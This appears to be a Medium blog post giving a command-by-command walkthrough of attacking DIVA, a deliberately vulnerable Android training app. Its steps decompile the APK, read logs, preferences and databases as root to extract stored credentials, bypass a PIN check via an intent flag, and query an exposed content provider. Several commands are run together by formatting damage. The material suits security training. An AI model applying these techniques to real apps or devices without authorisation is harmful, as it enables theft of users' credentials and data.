Let’s Hack Android: DIVA android

  1. Santoku: https://santoku-linux.com/download/
  2. Android VM: https://www.android-x86.org/
  3. DIVA android: https://github.com/payatu/diva-android
  1. Because Android Studio on Santoku is super old. I have to uninstall it.
sudo apt purge android-studio
https://developer.android.com/studio/install
cd /home/santoku/nano .bash_aliases
alias android-studio='sudo bash /opt/android-studio/bin/studio.sh'
. ~/.bashrc
alias
android-studio
  1. Open Diva android project
cd <apk path>
adb connect <ip>:5555
adb install app-debug.apk
  1. Dump the permissions
aapt dump permissions app-debug.apk
cp app-debug.apk app-debug.zipls
unzip app-debug.zip
dex2jar classes.dexls
jd-gui classes_dex2jar.jar
apktool d app-debug.apklscd app-debug
  1. Insecure Logging
adb logcat | grep "1234567"
adb shellsu
cd /data/datals
cd jakhar.aseem.divalscd shared_prefslscat jakhar.aseem.diva_preferences.xml
adb shellsucd /data/data/jakhar.aseem.diva/databasesls
cp divanotes.db /sdcard/cp ids2 /sdcard/
adb pull /sdcard/divanotes.dbadb pull /sdcard/ids2
sudo apt-get install sqlitebrowser
adb shellcd /data/data/jakhar.aseem.divals
cat <uinfo file>
adb shellsucd /mnt/sdcardls -la
cat .uinfo.txt
adb shell am start -n jakhar.aseem.diva/.APICredsActivity
adb shell am start -n jakhar.aseem.diva/.APICreds2Activity
adb shell am start -n jakhar.aseem.diva/.APICreds2Activity --ez check_pin false
adb shell content query --uri content://jakhar.aseem.diva.provider.notesprovider/notes

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store